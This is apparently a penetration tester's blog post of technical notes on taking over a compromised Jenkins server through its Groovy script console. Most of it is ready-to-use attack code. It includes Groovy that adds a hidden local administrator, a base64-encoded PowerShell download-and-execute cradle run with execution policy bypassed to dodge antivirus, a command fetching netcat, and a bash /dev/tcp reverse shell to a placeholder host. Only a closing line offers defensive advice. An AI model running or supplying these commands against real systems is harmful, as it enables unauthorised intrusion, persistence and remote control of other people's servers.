Hello all,

Posts of this type will be small technical notes about abusing/exploiting something. Just so I don't forget =)

During the last real-world penetration test, Jenkins was found. It was installed on Windows, and my goal was to get a reverse shell and avoid possible AV detection.

The part about how I gained access to Jenkins is not here, only small technical notes =)

The PowerShell payload itself is also not described here.

 

1) Add a Windows user with administrator rights. I know you think it is simple, and it is true =)

// run net.exe through cmd so its output comes back to the script console;
// the first command creates the account, the second makes it a local admin
def addUser = "cmd /c net user username SECUREPASSWORD /add".execute()
println "${addUser.text}"

def addAdmin = "cmd /c net localgroup administrators username /add".execute()
println "${addAdmin.text}"

Creating a user and adding it to the administrators group are not stealthy actions, but I put it here for history.

 

2) PowerShell execution in a Groovy script

PS command: iex (New-Object Net.WebClient).DownloadString('https://HOST/payload')

Encode: echo "iex (New-Object Net.WebClient).DownloadString('https://HOST/payload')" | iconv --to-code UTF-16LE | base64 -w 0

Result: aQBlAHgAIAAoAE4AZQB3AC0A....UAdAAuAFcAZQBiAEMAbABpAGUA

String to execute: cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc BASE64string

Groovy:

def process = "cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc aQBlAHgAIAAoA...A".execute()
println "${process.text}"

 

File download: powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://HOST/nc64.exe', 'C:\Jenkins\nc64.exe') }"

Encode: echo "& { (New-Object Net.WebClient).DownloadFile('https://HOST/nc64.exe', 'C:\Jenkins\nc64.exe') }" | iconv --to-code UTF-16LE | base64 -w 0

Groovy:

def process = "cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc Base64String".execute()
println "${process.text}"

 

3) And a reverse shell for Jenkins on Linux =) Thanks to pentestmonkey for the Java reverse shell.

Groovy:

// fd 5 becomes a TCP socket to IPADDR:PORT; every line read from it is run by bash
// with stdout and stderr sent back over the same socket
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IPADDR/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

 

P.S.: set a strong password on your Jenkins

 

Thank you for reading
